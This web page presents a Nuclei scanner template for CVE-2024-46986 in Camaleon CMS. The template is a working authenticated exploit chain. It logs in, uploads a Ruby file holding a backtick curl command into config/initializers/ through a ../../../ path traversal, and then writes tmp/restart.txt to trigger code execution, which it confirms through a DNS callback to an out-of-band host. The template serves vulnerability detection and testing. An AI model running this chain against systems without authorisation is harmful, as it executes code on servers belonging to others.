Camaleon CMS < 2.8.1 Arbitrary File Write to RCE

ID: CVE-2024-46986

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,camaleon,intrusive,rce,file-upload,authenticated

Description

An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application

YAML Source

id: CVE-2024-46986

info:
  name: Camaleon CMS < 2.8.1 Arbitrary File Write to RCE
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application
  reference:
    - https://github.com/advisories/GHSA-wmjg-vqhv-q5p5
    - https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
    - https://owasp.org/www-community/attacks/Path_Traversal
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2024-46986
    cwe-id: CWE-22,CWE-74
    epss-score: 0.0009
    epss-percentile: 0.39015
    cpe: cpe:2.3:a:tuzitio:camaleon_cms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    verified: true
    vendor: tuzitio
    product: camaleon_cms
    shodan-query: title:"Camaleon CMS"
    fofa-query: title="Camaleon CMS"
  tags: cve,cve2024,camaleon,intrusive,rce,file-upload,authenticated

variables:
  username: "{{username}}"
  password: "{{password}}"
  filename: "{{to_lower(rand_text_alpha(12))}}"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET /admin/login HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        internal: true
        name: nonce
        group: 1
        regex:
          - 'name="authenticity_token" value="(.*?)"'

  - raw:
      - |
        POST /admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Connection: keep-alive

        authenticity_token={{nonce}}&user%5Busername%5D={{username}}&user%5Bpassword%5D={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(location,"/admin/dashboard")'
        internal: true

  - raw:
      - |
        POST /admin/media/upload?actions=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8

        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="file_upload"; filename="{{filename}}.rb"
        Content-Type: text/x-ruby-script

        `curl {{interactsh-url}}`
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="folder"

        ../../../config/initializers/
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="skip_auto_crop"

        true
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8--

    matchers:
      - type: word
        part: body
        words:
          - '{"name":"{{filename}}.rb","folder_path":"../../../config/initializers"'
        internal: true

  - raw:
      - |
        POST /admin/media/upload?actions=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8

        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="file_upload"; filename="restart.txt"
        Content-Type: text/x-ruby-script

        {{randstr}}
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="folder"

        ../../../tmp/
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="skip_auto_crop"

        true
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8--

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - '{"name":"restart.txt","folder_path":"../../../tmp"'
# digest: 4b0a00483046022100acdf7dddfdc367abaf4c277e350409c4d3ce244507ab12b952e22b6c360b64d6022100bc00ec0288d977166768a15fdaf84dc53821f5311248e6254b9b85bc0dc66f11:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-46986.yaml"

View on Github